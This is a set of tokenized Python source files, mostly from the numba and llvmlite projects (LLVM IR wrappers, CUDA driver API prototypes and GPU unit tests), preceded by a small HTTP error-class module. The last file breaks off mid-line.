<s> from . data import STATUSES <EOL> class PycnicError ( Exception ) : <EOL> pass <EOL> class HTTPError ( PycnicError ) : <EOL> status_code = <NUM_LIT:0> <EOL> status = None <EOL> message = None <EOL> data = None <EOL> def __init__ ( self , status_code , message , data = None ) : <EOL> if self . status_code : <EOL> status_code = self . status_code <EOL> self . status_code = status_code <EOL> self . status = STATUSES [ status_code ] <EOL> self . message = message <EOL> self . data = data <EOL> def response ( self ) : <EOL> return { <EOL> "<STR_LIT:status>" : self . status , <EOL> "<STR_LIT>" : self . status_code , <EOL> "<STR_LIT:error>" : self . message , <EOL> "<STR_LIT:data>" : self . data <EOL> } <EOL> class HTTPNumeric ( HTTPError ) : <EOL> status_code = <NUM_LIT:0> <EOL> def __init__ ( self , message , data = None ) : <EOL> super ( HTTPError , self ) . __init__ ( self . status_code , message , data ) <EOL> self . status = STATUSES [ self . status_code ] <EOL> self . message = message <EOL> self . data = data <EOL> class HTTP_400 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> <EOL> class HTTP_401 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> <EOL> class HTTP_403 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> <EOL> class HTTP_404 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> <EOL> class HTTP_405 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> <EOL> class HTTP_408 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> <EOL> class HTTP_500 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> </s>
<s> from llvmlite import binding as llvm <EOL> from llvmlite import ir as lc <EOL> llvm . initialize ( ) <EOL> llvm . initialize_native_target ( ) <EOL> llvm . initialize_native_asmprinter ( ) <EOL> mod = lc . Module ( ) <EOL> mod . triple = llvm . get_default_triple ( ) <EOL> func = lc . Function ( mod , lc . FunctionType ( lc . VoidType ( ) , [ lc . IntType ( <NUM_LIT:32> ) ] ) , <EOL> name = '<STR_LIT:foo>' ) <EOL> builder = lc . IRBuilder ( func . append_basic_block ( ) ) <EOL> builder . ret_void ( ) <EOL> print ( mod ) <EOL> mod = llvm . parse_assembly ( str ( mod ) ) <EOL> mod . verify ( ) <EOL> print ( repr ( mod ) ) <EOL> print ( mod ) <EOL> with llvm . create_module_pass_manager ( ) as pm : <EOL> with llvm . create_pass_manager_builder ( ) as pmb : <EOL> pmb . populate ( pm ) <EOL> pm . run ( mod ) <EOL> print ( mod ) <EOL> tm = llvm . Target . from_default_triple ( ) . create_target_machine ( ) <EOL> ee = llvm . create_mcjit_compiler ( mod , tm ) <EOL> func = mod . get_function ( "<STR_LIT:foo>" ) <EOL> print ( func , ee . get_function_address ( "<STR_LIT:foo>" ) ) <EOL> ee . close ( ) <EOL> llvm . shutdown ( ) </s>
<s> import itertools <EOL> from llvmlite import ir <EOL> from llvmlite import binding as llvm <EOL> CallOrInvokeInstruction = ir . CallInstr <EOL> class LLVMException ( Exception ) : <EOL> pass <EOL> _icmp_ct = itertools . count ( ) <EOL> _icmp_get = lambda : next ( _icmp_ct ) <EOL> ICMP_EQ = _icmp_get ( ) <EOL> ICMP_NE = _icmp_get ( ) <EOL> ICMP_SLT = _icmp_get ( ) <EOL> ICMP_SLE = _icmp_get ( ) <EOL> ICMP_SGT = _icmp_get ( ) <EOL> ICMP_SGE = _icmp_get ( ) <EOL> ICMP_ULT = _icmp_get ( ) <EOL> ICMP_ULE = _icmp_get ( ) <EOL> ICMP_UGT = _icmp_get ( ) <EOL> ICMP_UGE = _icmp_get ( ) <EOL> FCMP_OEQ = _icmp_get ( ) <EOL> FCMP_OGT = _icmp_get ( ) <EOL> FCMP_OGE = _icmp_get ( ) <EOL> FCMP_OLT = _icmp_get ( ) <EOL> FCMP_OLE = _icmp_get ( ) <EOL> FCMP_ONE = _icmp_get ( ) <EOL> FCMP_ORD = _icmp_get ( ) <EOL> FCMP_UEQ = _icmp_get ( ) <EOL> FCMP_UGT = _icmp_get ( ) <EOL> FCMP_UGE = _icmp_get ( ) <EOL> FCMP_ULT = _icmp_get ( ) <EOL> FCMP_ULE = _icmp_get ( ) <EOL> FCMP_UNE = _icmp_get ( ) <EOL> FCMP_UNO = _icmp_get ( ) <EOL> INTR_FABS = "<STR_LIT>" <EOL> INTR_EXP = "<STR_LIT>" <EOL> INTR_LOG = "<STR_LIT>" <EOL> INTR_LOG10 = "<STR_LIT>" <EOL> INTR_SIN = "<STR_LIT>" <EOL> INTR_COS = "<STR_LIT>" <EOL> INTR_POWI = '<STR_LIT>' <EOL> INTR_POW = '<STR_LIT>' <EOL> INTR_FLOOR = '<STR_LIT>' <EOL> LINKAGE_EXTERNAL = '<STR_LIT>' <EOL> LINKAGE_INTERNAL = '<STR_LIT>' <EOL> LINKAGE_LINKONCE_ODR = '<STR_LIT>' <EOL> ATTR_NO_CAPTURE = '<STR_LIT>' <EOL> class Type ( object ) : <EOL> @ staticmethod <EOL> def int ( width = <NUM_LIT:32> ) : <EOL> return ir . IntType ( width ) <EOL> @ staticmethod <EOL> def float ( ) : <EOL> return ir . FloatType ( ) <EOL> @ staticmethod <EOL> def double ( ) : <EOL> return ir . DoubleType ( ) <EOL> @ staticmethod <EOL> def pointer ( ty , addrspace = <NUM_LIT:0> ) : <EOL> return ir . PointerType ( ty , addrspace ) <EOL> @ staticmethod <EOL> def function ( res , args , var_arg = False ) : <EOL> return ir . FunctionType ( res , args , var_arg = var_arg ) <EOL> @ staticmethod <EOL> def struct ( members ) : <EOL> return ir . LiteralStructType ( members ) <EOL> @ staticmethod <EOL> def array ( element , count ) : <EOL> return ir . ArrayType ( element , count ) <EOL> @ staticmethod <EOL> def void ( ) : <EOL> return ir . VoidType ( ) <EOL> class Constant ( object ) : <EOL> @ staticmethod <EOL> def all_ones ( ty ) : <EOL> if isinstance ( ty , ir . IntType ) : <EOL> return Constant . int ( ty , int ( '<STR_LIT:1>' * ty . width , <NUM_LIT:2> ) ) <EOL> else : <EOL> raise NotImplementedError ( ty ) <EOL> @ staticmethod <EOL> def int ( ty , n ) : <EOL> return ir . Constant ( ty , n ) <EOL> @ staticmethod <EOL> def int_signextend ( ty , n ) : <EOL> return ir . Constant ( ty , n ) <EOL> @ staticmethod <EOL> def real ( ty , n ) : <EOL> return ir . Constant ( ty , n ) <EOL> @ staticmethod <EOL> def struct ( elems ) : <EOL> return ir . Constant . literal_struct ( elems ) <EOL> @ staticmethod <EOL> def null ( ty ) : <EOL> return ir . Constant ( ty , None ) <EOL> @ staticmethod <EOL> def undef ( ty ) : <EOL> return ir . Constant ( ty , ir . Undefined ) <EOL> @ staticmethod <EOL> def stringz ( string ) : <EOL> n = ( len ( string ) + <NUM_LIT:1> ) <EOL> buf = bytearray ( ( '<STR_LIT:U+0020>' * n ) . encode ( '<STR_LIT:ascii>' ) ) <EOL> buf [ - <NUM_LIT:1> ] = <NUM_LIT:0> <EOL> buf [ : - <NUM_LIT:1> ] = string . encode ( '<STR_LIT:utf-8>' ) <EOL> return ir . Constant ( ir . ArrayType ( ir . IntType ( <NUM_LIT:8> ) , n ) , buf ) <EOL> @ staticmethod <EOL> def array ( typ , val ) : <EOL> return ir . Constant ( ir . ArrayType ( typ , len ( val ) ) , val ) <EOL> @ staticmethod <EOL> def bitcast ( const , typ ) : <EOL> return const . bitcast ( typ ) <EOL> @ staticmethod <EOL> def inttoptr ( const , typ ) : <EOL> return const . inttoptr ( typ ) <EOL> @ staticmethod <EOL> def gep ( const , indices ) : <EOL> return const . gep ( indices ) <EOL> class Module ( ir . Module ) : <EOL> def get_or_insert_function ( self , fnty , name ) : <EOL> if name in self . globals : <EOL> return self . globals [ name ] <EOL> else : <EOL> return ir . Function ( self , fnty , name ) <EOL> def verify ( self ) : <EOL> llvm . parse_assembly ( str ( self ) ) <EOL> def add_function ( self , fnty , name ) : <EOL> return ir . Function ( self , fnty , name ) <EOL> def add_global_variable ( self , ty , name , addrspace = <NUM_LIT:0> ) : <EOL> return ir . GlobalVariable ( self , ty , self . get_unique_name ( name ) , <EOL> addrspace ) <EOL> def get_global_variable_named ( self , name ) : <EOL> try : <EOL> return self . globals [ name ] <EOL> except KeyError : <EOL> raise LLVMException ( name ) <EOL> def get_or_insert_named_metadata ( self , name ) : <EOL> try : <EOL> return self . get_named_metadata ( name ) <EOL> except KeyError : <EOL> return self . add_named_metadata ( name ) <EOL> class Function ( ir . Function ) : <EOL> @ classmethod <EOL> def new ( cls , module_obj , functy , name = '<STR_LIT>' ) : <EOL> return cls ( module_obj , functy , name ) <EOL> @ staticmethod <EOL> def intrinsic ( module , intrinsic , tys ) : <EOL> return module . declare_intrinsic ( intrinsic , tys ) <EOL> _icmp_umap = { <EOL> ICMP_EQ : '<STR_LIT>' , <EOL> ICMP_NE : '<STR_LIT>' , <EOL> ICMP_ULT : '<STR_LIT:<>' , <EOL> ICMP_ULE : '<STR_LIT>' , <EOL> ICMP_UGT : '<STR_LIT:>>' , <EOL> ICMP_UGE : '<STR_LIT>' , <EOL> } <EOL> _icmp_smap = { <EOL> ICMP_SLT : '<STR_LIT:<>' , <EOL> ICMP_SLE : '<STR_LIT>' , <EOL> ICMP_SGT : '<STR_LIT:>>' , <EOL> ICMP_SGE : '<STR_LIT>' , <EOL> } <EOL> _fcmp_omap = { <EOL> FCMP_OEQ : '<STR_LIT>' , <EOL> FCMP_OGT : '<STR_LIT:>>' , <EOL> FCMP_OGE : '<STR_LIT>' , <EOL> FCMP_OLT : '<STR_LIT:<>' , <EOL> FCMP_OLE : '<STR_LIT>' , <EOL> FCMP_ONE : '<STR_LIT>' , <EOL> FCMP_ORD : '<STR_LIT>' , <EOL> } <EOL> _fcmp_umap = { <EOL> FCMP_UEQ : '<STR_LIT>' , <EOL> FCMP_UGT : '<STR_LIT:>>' , <EOL> FCMP_UGE : '<STR_LIT>' , <EOL> FCMP_ULT : '<STR_LIT:<>' , <EOL> FCMP_ULE : '<STR_LIT>' , <EOL> FCMP_UNE : '<STR_LIT>' , <EOL> FCMP_UNO : '<STR_LIT>' , <EOL> } <EOL> class Builder ( ir . IRBuilder ) : <EOL> def icmp ( self , pred , lhs , rhs , name = '<STR_LIT>' ) : <EOL> if pred in _icmp_umap : <EOL> return self . icmp_unsigned ( _icmp_umap [ pred ] , lhs , rhs , name = name ) <EOL> else : <EOL> return self . icmp_signed ( _icmp_smap [ pred ] , lhs , rhs , name = name ) <EOL> def fcmp ( self , pred , lhs , rhs , name = '<STR_LIT>' ) : <EOL> if pred in _fcmp_umap : <EOL> return self . fcmp_unordered ( _fcmp_umap [ pred ] , lhs , rhs , name = name ) <EOL> else : <EOL> return self . fcmp_ordered ( _fcmp_omap [ pred ] , lhs , rhs , name = name ) <EOL> class MetaDataString ( ir . MetaDataString ) : <EOL> @ staticmethod <EOL> def get ( module , text ) : <EOL> return MetaDataString ( module , text ) <EOL> class MetaData ( ir . MetaData ) : <EOL> @ staticmethod <EOL> def get ( module , values ) : <EOL> return module . add_metadata ( values ) <EOL> class InlineAsm ( ir . InlineAsm ) : <EOL> @ staticmethod <EOL> def get ( * args , ** kwargs ) : <EOL> return InlineAsm ( * args , ** kwargs ) </s>
<s> from numba import exportmany , export <EOL> def mult ( a , b ) : <EOL> return a * b <EOL> export ( '<STR_LIT>' ) ( mult ) <EOL> exportmany ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ( mult ) </s>
<s> from __future__ import print_function , division , absolute_import <EOL> from numba import double <EOL> from numba . decorators import jit as jit <EOL> def sum2d ( arr ) : <EOL> M , N = arr . shape <EOL> result = <NUM_LIT:0.0> <EOL> for i in range ( M ) : <EOL> for j in range ( N ) : <EOL> result += arr [ i , j ] <EOL> return result <EOL> jitsum2d = jit ( sum2d ) <EOL> csum2d = jitsum2d . compile ( double ( double [ : , : : <NUM_LIT:1> ] ) ) <EOL> from numpy import random <EOL> arr = random . randn ( <NUM_LIT:100> , <NUM_LIT:100> ) <EOL> import time <EOL> start = time . time ( ) <EOL> res = sum2d ( arr ) <EOL> duration = time . time ( ) - start <EOL> print ( "<STR_LIT>" % ( res , duration * <NUM_LIT:1000> ) ) <EOL> csum2d ( arr ) <EOL> start = time . time ( ) <EOL> res = csum2d ( arr ) <EOL> duration2 = time . time ( ) - start <EOL> print ( "<STR_LIT>" % ( res , duration2 * <NUM_LIT:1000> ) ) <EOL> print ( "<STR_LIT>" % ( duration / duration2 ) ) </s>
<s> from __future__ import print_function , absolute_import , division <EOL> from ctypes import * <EOL> cu_device = c_int <EOL> cu_device_attribute = c_int <EOL> cu_context = c_void_p <EOL> cu_module = c_void_p <EOL> cu_jit_option = c_int <EOL> cu_jit_input_type = c_int <EOL> cu_function = c_void_p <EOL> cu_device_ptr = c_size_t <EOL> cu_stream = c_void_p <EOL> cu_event = c_void_p <EOL> cu_link_state = c_void_p <EOL> cu_function_attribute = c_int <EOL> cu_occupancy_b2d_size = CFUNCTYPE ( c_size_t , c_int ) <EOL> API_PROTOTYPES = { <EOL> '<STR_LIT>' : ( c_int , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( c_int ) ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( c_int ) ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_device ) , c_int ) , <EOL> '<STR_LIT>' : ( c_int , c_char_p , c_int , cu_device ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( c_int ) , cu_device_attribute , <EOL> cu_device ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( c_int ) , POINTER ( c_int ) , <EOL> cu_device ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_context ) , c_uint , cu_device ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_device ) ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_context ) ) , <EOL> '<STR_LIT>' : ( c_int , cu_context ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_context ) ) , <EOL> '<STR_LIT>' : ( c_int , cu_context ) , <EOL> '<STR_LIT>' : ( c_int , cu_module , c_void_p , c_uint , <EOL> POINTER ( cu_jit_option ) , POINTER ( c_void_p ) ) , <EOL> '<STR_LIT>' : ( c_int , cu_module ) , <EOL> '<STR_LIT>' : ( c_int , cu_function , cu_module , c_char_p ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_device_ptr ) , POINTER ( c_size_t ) , <EOL> cu_module , c_char_p ) , <EOL> '<STR_LIT>' : ( c_int , cu_function , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_device_ptr ) , c_size_t ) , <EOL> '<STR_LIT>' : ( c_int , cu_device_ptr , c_uint8 , c_size_t ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> cu_device_ptr , c_uint8 , c_size_t , cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , cu_device_ptr , c_void_p , c_size_t ) , <EOL> '<STR_LIT>' : ( c_int , cu_device_ptr , c_void_p , c_size_t , <EOL> cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , cu_device_ptr , cu_device_ptr , c_size_t ) , <EOL> '<STR_LIT>' : ( c_int , cu_device_ptr , cu_device_ptr , c_size_t , <EOL> cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p , cu_device_ptr , c_size_t ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p , cu_device_ptr , c_size_t , <EOL> cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , cu_device_ptr ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_stream ) , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , cu_function , c_uint , c_uint , c_uint , <EOL> c_uint , c_uint , c_uint , c_uint , cu_stream , <EOL> POINTER ( c_void_p ) , POINTER ( c_void_p ) ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p , c_size_t , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p , c_size_t , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_device_ptr ) , <EOL> c_void_p , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( c_size_t ) , POINTER ( c_size_t ) ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_event ) , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , cu_event ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( c_float ) , cu_event , cu_event ) , <EOL> '<STR_LIT>' : ( c_int , cu_event ) , <EOL> '<STR_LIT>' : ( c_int , cu_event , cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , cu_event ) , <EOL> '<STR_LIT>' : ( c_int , cu_stream , cu_event , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , c_void_p , c_uint , cu_device_ptr ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( cu_device_ptr ) , <EOL> POINTER ( c_size_t ) , <EOL> cu_device_ptr ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( c_uint ) , <EOL> c_void_p ) , <EOL> '<STR_LIT>' : ( c_int , ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> c_uint , POINTER ( cu_jit_option ) , <EOL> POINTER ( c_void_p ) , POINTER ( cu_link_state ) ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> cu_link_state , cu_jit_input_type , c_void_p , <EOL> c_size_t , c_char_p , c_uint , POINTER ( cu_jit_option ) , <EOL> POINTER ( c_void_p ) ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> cu_link_state , cu_jit_input_type , c_char_p , c_uint , <EOL> POINTER ( cu_jit_option ) , POINTER ( c_void_p ) ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> cu_link_state , POINTER ( c_void_p ) , POINTER ( c_size_t ) ) , <EOL> '<STR_LIT>' : ( c_int , cu_link_state ) , <EOL> '<STR_LIT>' : ( c_int , ) , <EOL> '<STR_LIT>' : ( c_int , ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( c_int ) , cu_function_attribute , cu_function ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( c_int ) , cu_function , c_size_t , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( c_int ) , cu_function , c_size_t , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( c_int ) , POINTER ( c_int ) , cu_function , cu_occupancy_b2d_size , c_size_t , c_int ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> POINTER ( c_int ) , POINTER ( c_int ) , cu_function , cu_occupancy_b2d_size , c_size_t , c_int , c_uint ) , <EOL> } </s>
<s> '''<STR_LIT>''' <EOL> class NvvmSupportError ( ImportError ) : <EOL> pass <EOL> class NVVM ( object ) : <EOL> def __init__ ( self ) : <EOL> raise NvvmSupportError ( '<STR_LIT>' ) <EOL> CompilationUnit = None <EOL> llvm_to_ptx = None <EOL> set_cuda_kernel = None <EOL> fix_data_layout = None <EOL> get_arch_option = None <EOL> SUPPORTED_CC = None <EOL> LibDevice = None <EOL> NvvmError = None <EOL> def is_available ( ) : <EOL> return False </s>
<s> import numpy as np <EOL> from numba import from_dtype , cuda <EOL> from numba import unittest_support as unittest <EOL> from numba . cuda . testing import skip_on_cudasim <EOL> class TestAlignment ( unittest . TestCase ) : <EOL> def test_record_alignment ( self ) : <EOL> rec_dtype = np . dtype ( [ ( '<STR_LIT:a>' , '<STR_LIT>' ) , ( '<STR_LIT:b>' , '<STR_LIT>' ) ] , align = True ) <EOL> rec = from_dtype ( rec_dtype ) <EOL> @ cuda . jit ( ( rec [ : ] , ) ) <EOL> def foo ( a ) : <EOL> i = cuda . grid ( <NUM_LIT:1> ) <EOL> a [ i ] . a = a [ i ] . b <EOL> a_recarray = np . recarray ( <NUM_LIT:3> , dtype = rec_dtype ) <EOL> for i in range ( a_recarray . size ) : <EOL> a_rec = a_recarray [ i ] <EOL> a_rec . a = <NUM_LIT:0> <EOL> a_rec . b = ( i + <NUM_LIT:1> ) * <NUM_LIT> <EOL> foo [ <NUM_LIT:1> , <NUM_LIT:3> ] ( a_recarray ) <EOL> self . assertTrue ( np . all ( a_recarray . a == a_recarray . b ) ) <EOL> @ skip_on_cudasim ( '<STR_LIT>' ) <EOL> def test_record_alignment_error ( self ) : <EOL> rec_dtype = np . dtype ( [ ( '<STR_LIT:a>' , '<STR_LIT>' ) , ( '<STR_LIT:b>' , '<STR_LIT>' ) ] ) <EOL> rec = from_dtype ( rec_dtype ) <EOL> with self . assertRaises ( Exception ) as raises : <EOL> @ cuda . jit ( ( rec [ : ] , ) ) <EOL> def foo ( a ) : <EOL> i = cuda . grid ( <NUM_LIT:1> ) <EOL> a [ i ] . a = a [ i ] . b <EOL> self . assertTrue ( '<STR_LIT>' in str ( raises . exception ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function , absolute_import , division <EOL> import numpy as np <EOL> import time <EOL> from numba import cuda , config , float64 , void <EOL> from numba . cuda . testing import unittest <EOL> if config . ENABLE_CUDASIM : <EOL> tpb = <NUM_LIT:4> <EOL> else : <EOL> tpb = <NUM_LIT:16> <EOL> SM_SIZE = tpb , tpb <EOL> class TestCudaLaplace ( unittest . TestCase ) : <EOL> def test_laplace_small ( self ) : <EOL> @ cuda . jit ( float64 ( float64 , float64 ) , device = True , inline = True ) <EOL> def get_max ( a , b ) : <EOL> if a > b : <EOL> return a <EOL> else : <EOL> return b <EOL> @ cuda . jit ( void ( float64 [ : , : ] , float64 [ : , : ] , float64 [ : , : ] ) ) <EOL> def jocabi_relax_core ( A , Anew , error ) : <EOL> err_sm = cuda . shared . array ( SM_SIZE , dtype = float64 ) <EOL> ty = cuda . threadIdx . x <EOL> tx = cuda . threadIdx . y <EOL> bx = cuda . blockIdx . x <EOL> by = cuda . blockIdx . y <EOL> n = A . shape [ <NUM_LIT:0> ] <EOL> m = A . shape [ <NUM_LIT:1> ] <EOL> i , j = cuda . grid ( <NUM_LIT:2> ) <EOL> err_sm [ ty , tx ] = <NUM_LIT:0> <EOL> if j >= <NUM_LIT:1> and j < n - <NUM_LIT:1> and i >= <NUM_LIT:1> and i < m - <NUM_LIT:1> : <EOL> Anew [ j , i ] = <NUM_LIT> * ( A [ j , i + <NUM_LIT:1> ] + A [ j , i - <NUM_LIT:1> ] + A [ j - <NUM_LIT:1> , i ] + A [ j + <NUM_LIT:1> , i ] ) <EOL> err_sm [ ty , tx ] = Anew [ j , i ] - A [ j , i ] <EOL> cuda . syncthreads ( ) <EOL> t = tpb // <NUM_LIT:2> <EOL> while t > <NUM_LIT:0> : <EOL> if ty < t : <EOL> err_sm [ ty , tx ] = get_max ( err_sm [ ty , tx ] , err_sm [ ty + t , tx ] ) <EOL> t //= <NUM_LIT:2> <EOL> cuda . syncthreads ( ) <EOL> t = tpb // <NUM_LIT:2> <EOL> while t > <NUM_LIT:0> : <EOL> if tx < t and ty == <NUM_LIT:0> : <EOL> err_sm [ ty , tx ] = get_max ( err_sm [ ty , tx ] , err_sm [ ty , tx + t ] ) <EOL> t //= <NUM_LIT:2> <EOL> cuda . syncthreads ( ) <EOL> if tx == <NUM_LIT:0> and ty == <NUM_LIT:0> : <EOL> error [ by , bx ] = err_sm [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> if config . ENABLE_CUDASIM : <EOL> NN , NM = <NUM_LIT:4> , <NUM_LIT:4> <EOL> iter_max = <NUM_LIT:20> <EOL> else : <EOL> NN , NM = <NUM_LIT> , <NUM_LIT> <EOL> iter_max = <NUM_LIT:1000> <EOL> A = np . zeros ( ( NN , NM ) , dtype = np . float64 ) <EOL> Anew = np . zeros ( ( NN , NM ) , dtype = np . float64 ) <EOL> n = NN <EOL> m = NM <EOL> tol = <NUM_LIT> <EOL> error = <NUM_LIT:1.0> <EOL> for j in range ( n ) : <EOL> A [ j , <NUM_LIT:0> ] = <NUM_LIT:1.0> <EOL> Anew [ j , <NUM_LIT:0> ] = <NUM_LIT:1.0> <EOL> timer = time . time ( ) <EOL> iter = <NUM_LIT:0> <EOL> blockdim = ( tpb , tpb ) <EOL> griddim = ( NN // blockdim [ <NUM_LIT:0> ] , NM // blockdim [ <NUM_LIT:1> ] ) <EOL> error_grid = np . zeros ( griddim ) <EOL> stream = cuda . stream ( ) <EOL> dA = cuda . to_device ( A , stream ) <EOL> dAnew = cuda . to_device ( Anew , stream ) <EOL> derror_grid = cuda . to_device ( error_grid , stream ) <EOL> while error > tol and iter < iter_max : <EOL> self . assertTrue ( error_grid . dtype == np . float64 ) <EOL> jocabi_relax_core [ griddim , blockdim , stream ] ( dA , dAnew , derror_grid ) <EOL> derror_grid . copy_to_host ( error_grid , stream = stream ) <EOL> stream . synchronize ( ) <EOL> error = np . abs ( error_grid ) . max ( ) <EOL> tmp = dA <EOL> dA = dAnew <EOL> dAnew = tmp <EOL> iter += <NUM_LIT:1> <EOL> runtime = time . time ( ) - timer <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from numba . testing import SerialSuite <EOL> from numba . testing import load_testsuite <EOL> import os <EOL> from numba import config <EOL> def load_tests ( loader , tests , pattern ) : <EOL> return SerialSuite ( load_testsuite ( loader , os . path . dirname ( __file__ ) ) ) </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> DATALAYOUT = { <EOL> <NUM_LIT:64> : ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> } <EOL> TRIPLE = "<STR_LIT>" <EOL> if os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) not in [ '<STR_LIT:0>' , '<STR_LIT>' , '<STR_LIT:false>' ] : <EOL> from . import libhlc as hlc </s>
<s> from __future__ import print_function , absolute_import <EOL> import numpy as np <EOL> from numba import unittest_support as unittest <EOL> from numba . hsa . vectorizers import HsaGUFuncVectorize <EOL> from numba . hsa . dispatch import HSAGenerializedUFunc <EOL> from numba import guvectorize <EOL> def ufunc_add_core ( a , b , c ) : <EOL> for i in range ( c . size ) : <EOL> c [ i ] = a [ i ] + b [ i ] <EOL> class TestGUFuncBuilding ( unittest . TestCase ) : <EOL> def test_gufunc_building ( self ) : <EOL> ufbldr = HsaGUFuncVectorize ( ufunc_add_core , "<STR_LIT>" ) <EOL> ufbldr . add ( "<STR_LIT>" ) <EOL> ufbldr . add ( "<STR_LIT>" ) <EOL> ufunc = ufbldr . build_ufunc ( ) <EOL> self . assertIsInstance ( ufunc , HSAGenerializedUFunc ) <EOL> A = np . arange ( <NUM_LIT:100> , dtype = np . intp ) <EOL> B = np . arange ( <NUM_LIT:100> , dtype = np . intp ) + <NUM_LIT:1> <EOL> expected = A + B <EOL> got = ufunc ( A , B ) <EOL> np . testing . assert_equal ( expected , got ) <EOL> self . assertEqual ( expected . dtype , got . dtype ) <EOL> self . assertEqual ( np . dtype ( np . intp ) , got . dtype ) <EOL> A = A . reshape ( <NUM_LIT:50> , <NUM_LIT:2> ) <EOL> B = B . reshape ( <NUM_LIT:50> , <NUM_LIT:2> ) <EOL> expected = A + B <EOL> got = ufunc ( A , B ) <EOL> np . testing . assert_equal ( expected , got ) <EOL> self . assertEqual ( expected . dtype , got . dtype ) <EOL> self . assertEqual ( np . dtype ( np . intp ) , got . dtype ) <EOL> A = A . reshape ( <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT:2> ) <EOL> B = B . reshape ( <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT:2> ) <EOL> expected = A + B <EOL> got = ufunc ( A , B ) <EOL> np . testing . assert_equal ( expected , got ) <EOL> self . assertEqual ( expected . dtype , got . dtype ) <EOL> self . assertEqual ( np . dtype ( np . intp ) , got . dtype ) <EOL> A = np . arange ( <NUM_LIT:100> , dtype = np . float32 ) <EOL> B = np . arange ( <NUM_LIT:100> , dtype = np . float32 ) + <NUM_LIT:1> <EOL> expected = A + B <EOL> got = ufunc ( A , B ) <EOL> np . testing . assert_allclose ( expected , got ) <EOL> self . assertEqual ( expected . dtype , got . dtype ) <EOL> self . assertEqual ( np . dtype ( np . float32 ) , got . dtype ) <EOL> A = A . reshape ( <NUM_LIT:50> , <NUM_LIT:2> ) <EOL> B = B . reshape ( <NUM_LIT:50> , <NUM_LIT:2> ) <EOL> expected = A + B <EOL> got = ufunc ( A , B ) <EOL> np . testing . assert_allclose ( expected , got ) <EOL> self . assertEqual ( expected . dtype , got . dtype ) <EOL> self . assertEqual ( np . dtype ( np . float32 ) , got . dtype ) <EOL> def test_gufunc_building_scalar_output ( self ) : <EOL> def sum_row ( inp , out ) : <EOL> tmp = <NUM_LIT:0.> <EOL> for i in range ( inp . shape [ <NUM_LIT:0> ] ) : <EOL> tmp += inp [ i ] <EOL> out [ <NUM_LIT:0> ] = tmp <EOL> ufbldr = HsaGUFuncVectorize ( sum_row , "<STR_LIT>" ) <EOL> ufbldr . add ( "<STR_LIT>" ) <EOL> ufunc = ufbldr . build_ufunc ( ) <EOL> inp = np . arange ( <NUM_LIT> , dtype = np . int32 ) . reshape ( <NUM_LIT:100> , <NUM_LIT:3> ) <EOL> out = ufunc ( inp ) <EOL> for i in range ( inp . shape [ <NUM_LIT:0> ] ) : <EOL> np . testing . assert_equal ( inp [ i ] . sum ( ) , out [ i ] ) <EOL> def test_gufunc_scalar_input_saxpy ( self ) : <EOL> def axpy ( a , x , y , out ) : <EOL> for i in range ( out . shape [ <NUM_LIT:0> ] ) : <EOL> out [ i ] = a * x [ i ] + y [ i ] <EOL> ufbldr = HsaGUFuncVectorize ( axpy , '<STR_LIT>' ) <EOL> ufbldr 